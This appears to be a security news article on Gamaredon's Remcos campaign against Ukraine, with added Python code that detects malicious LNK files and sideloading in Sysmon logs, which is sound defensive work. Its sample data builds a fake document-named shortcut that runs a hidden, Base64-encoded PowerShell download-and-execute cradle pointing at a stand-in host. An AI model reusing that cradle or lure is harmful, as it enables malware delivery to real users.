5 Alarming Tactics Used by Gamaredon to Deploy Remcos Backdoor via LNK Files on Windows



Overview of the Cyber Espionage Strategy

A new sophisticated cyber espionage campaign, spearheaded by the Russia-linked Gamaredon group, targets Ukrainian entities with advanced tactics and deceptive practices to implant malware.

Weaponized LNK Files as a Deceptive Delivery Mechanism

Camouflaged as innocuous Office documents, the weaponized LNK files used in these attacks carry the pernicious Remcos backdoor. The lures are themed around troop movements in Ukraine to bait victims into opening the shortcuts and activating the payload.

The Infection Process

The malicious cycle triggers when victims receive ZIP archives that contain LNK shortcuts, misleadingly labeled with military titles such as “Probable location of communication nodes” and “Coordinates of enemy takeoffs.” Executing these files launches a stealthy PowerShell operation while displaying a decoy document to mislead the target and mask the ongoing malicious activities.

The cybersecurity experts at Cisco Talos identified this sophisticated campaign, active since November 2024, targeting Ukraine’s government and critical infrastructure sectors.

Evasion and Obfuscation Techniques

  • The PowerShell downloader is obfuscated to slip past security defenses.
  • It communicates with geofenced (geographically restricted) servers in Russia and Germany to download the further malware stages.
  • PowerShell commands are executed indirectly so that the string-based detections common in many security products do not see the real command.
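As an added defensive example (not code from the article or from Cisco Talos), the script below shows how the delivery chain and the PowerShell tricks above can be checked on a mail gateway or in a sandbox: it opens a ZIP, parses each .lnk entry against the public MS-SHLLINK layout (76-byte header, optional ID list and link info, then the string fields), decodes any -EncodedCommand argument so that string rules see the real command rather than its Base64 wrapper, and reports the indicators an analyst would want (PowerShell target, hidden window, double extension, borrowed document icon). The archive, file names, paths and the encoded command are all constructed here, and the rule set is a starting point, not the one Talos used.

```python
"""Scan a ZIP for Windows shortcuts (.lnk) that launch PowerShell.

Added example, not taken from the article or Cisco Talos. LNK layout per
MS-SHLLINK: 76-byte ShellLinkHeader, optional LinkTargetIDList/LinkInfo, then
StringData (name, relative path, working dir, arguments, icon location).
Every sample file below is constructed for the demo.
"""
import base64, io, re, struct, zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the console window out of the user's way

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a shell link."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_IDLIST:      # skip LinkTargetIDList: u16 size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # skip LinkInfo: u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, key in STRING_FIELDS:   # each string: u16 char count, then chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                fields[key] = data[pos:pos + count].decode("cp1252", "replace")
                pos += count
    return fields

ARG_RULES = [
    (r"-e(nc|ncodedcommand)?\b", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-nop(rofile)?\b|-noni(nteractive)?\b", "no profile / non-interactive"),
    (r"-e(p|xecutionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\.webclient", "download/eval cradle"),
]
DOC_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx")

def decode_encoded_command(args: str) -> str:
    """Recover the UTF-16LE script behind -EncodedCommand so rules can scan it too."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "replace")
    except ValueError:
        return ""

def assess_lnk(filename: str, f: dict) -> list:
    """Collect human-readable indicators for one parsed shortcut."""
    findings = []
    target = (f.get("relative_path", "") + " " + f.get("arguments", "")).lower()
    if re.search(r"powershell|pwsh", target):
        findings.append("launches PowerShell")
    text = target + " " + decode_encoded_command(f.get("arguments", "")).lower()
    findings += [label for pat, label in ARG_RULES if re.search(pat, text, re.I)]
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimized and unfocused")
    if filename.lower().rsplit(".lnk", 1)[0].endswith(DOC_EXTS):
        findings.append("double extension mimics a document")
    if re.search(r"winword|excel|powerpnt|acrord", f.get("icon_location", "").lower()):
        findings.append("icon borrowed from a document viewer")
    return findings

def scan_zip(zip_bytes: bytes) -> dict:
    """Map every .lnk entry in the archive to its list of findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                try:
                    results[info.filename] = assess_lnk(info.filename, parse_lnk(zf.read(info)))
                except ValueError:
                    results[info.filename] = ["unparseable .lnk"]
    return results

# ---- constructed sample data (header + StringData only, no IDList/LinkInfo) ----
def build_lnk(relative_path, arguments="", show_command=1, icon_location=""):
    flags = HAS_RELPATH | IS_UNICODE | (HAS_ARGS if arguments else 0) | (HAS_ICON if icon_location else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location) if s)
    return header + body + b"\x00\x00\x00\x00"   # terminal ExtraData block

INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"  # constructed
ENCODED = base64.b64encode(INNER.encode("utf-16-le")).decode()

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.lnk", build_lnk(r"..\Windows\notepad.exe"))
        zf.writestr("Coordinates of enemy takeoffs.docx.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            f"-w hidden -nop -ep bypass -enc {ENCODED}", show_command=SW_SHOWMINNOACTIVE,
            icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"))
    return buf.getvalue()

SAMPLE_ZIP = build_sample_zip()

if __name__ == "__main__":
    for name, findings in scan_zip(SAMPLE_ZIP).items():
        print(f"{name}: {findings or 'clean'}")
```

The decode step is the part that matters against the third bullet: rules matched only on the raw argument string never see "DownloadString" when it arrives Base64-encoded, so the decoded text is appended to the searched text before the rules run. Real archives may also carry shortcuts with an ID list and LinkInfo block, which the parser skips using the sizes the format provides.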

DLL Sideloading: A Stealthy Method to Execute Malware

The attackers employ DLL sideloading: the legitimate application TiVoDiag.exe is abused to load a malicious DLL named “mindclient.dll.” This covert technique lets them load and execute the Remcos backdoor from encrypted files in the ZIP archive, as illustrated in the recent findings from Cisco Talos.

This approach exploits the predictable DLL search order in Windows, which checks the directory of the executable before the system directories, causing the system to load the malicious DLL placed next to the application instead of the legitimate one.

Once the backdoor is running, it injects itself into the Explorer.exe process, facilitating persistent espionage activities through communications with control servers hosted on GTHost and HyperHosting.
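The sideloading and Explorer.exe injection just described leave two tell-tale events when Sysmon is deployed: an ImageLoad (Event ID 7) where the DLL resolves from the executable's own directory, and a CreateRemoteThread (Event ID 8) whose target is explorer.exe. The following added example (not Cisco Talos code) runs two such rules over constructed events that reuse the file names from the article; the staging directory, the Signed values, the vendor and csrss.exe contrast events and the alert wording are assumptions for the demo, and the field names follow Sysmon's schema.

```python
"""Detect DLL sideloading and explorer.exe injection from Sysmon-style events.

Added example, not Cisco Talos code. Events are constructed dicts that use
Sysmon's field names (Image, ImageLoaded, Signed, SourceImage, TargetImage).
"""
import ntpath

# Path fragments that a standard user can write to (assumption: tune per estate).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\")
WINDOWS_DIRS = ("c:\\windows\\",)

def dir_of(path: str) -> str:
    """Normalised directory of a Windows path, comparable across events."""
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"

def is_user_writable(path: str) -> bool:
    return any(hint in path.lower() for hint in USER_WRITABLE)

def check_image_load(ev: dict):
    """Event ID 7. A DLL resolved from the application's own directory is the
    sideloading pattern; report it when that directory is user-writable or the
    DLL is unsigned. Loads inside C:\\Windows are expected and skipped."""
    image, dll = ev["Image"], ev["ImageLoaded"]
    if dir_of(image) != dir_of(dll) or dll.lower().startswith(WINDOWS_DIRS):
        return None
    reasons = []
    if is_user_writable(dll):
        reasons.append("loaded from user-writable directory")
    if ev.get("Signed", "false").lower() != "true":
        reasons.append("DLL unsigned")
    if not reasons:
        return None
    return (f"possible DLL sideloading: {ntpath.basename(image)} -> "
            f"{ntpath.basename(dll)} ({'; '.join(reasons)})")

def check_remote_thread(ev: dict):
    """Event ID 8. A thread created inside explorer.exe by a binary that does
    not live under C:\\Windows is the injection behaviour described above."""
    src, tgt = ev["SourceImage"], ev["TargetImage"]
    if ntpath.basename(tgt).lower() != "explorer.exe" or src.lower().startswith(WINDOWS_DIRS):
        return None
    return f"remote thread into explorer.exe from {src}"

RULES = {7: check_image_load, 8: check_remote_thread}

def triage(events: list) -> list:
    """Return (event index, alert text) for every event that trips a rule."""
    alerts = []
    for i, ev in enumerate(events):
        rule = RULES.get(ev["EventID"])
        hit = rule(ev) if rule else None
        if hit:
            alerts.append((i, hit))
    return alerts

# ---- constructed sample telemetry (paths and Signed values are assumptions) ----
STAGE_DIR = r"C:\Users\victim\AppData\Local\Temp\Probable location of communication nodes"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": STAGE_DIR + r"\TiVoDiag.exe",
     "ImageLoaded": STAGE_DIR + r"\mindclient.dll", "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 8, "SourceImage": STAGE_DIR + r"\TiVoDiag.exe", "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for index, alert in triage(SAMPLE_EVENTS):
        print(f"event {index}: {alert}")
```

The C:\Windows allowlist is deliberately coarse: some subdirectories of it are writable by users, so a production rule would check the signer of the source binary (or its hash against an inventory) rather than its path alone, and would correlate the Event ID 7 hit with the preceding Event ID 1 process creation from the extracted archive directory.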

Implications and Defense Strategies

This ongoing campaign underscores the strategic persistence of the Gamaredon group in its cyber espionage initiatives against Ukraine. Affected organizations and allies are urged to adopt stringent security measures and remain vigilant for signs of compromise linked to this campaign.


Last Updated: March 29, 2025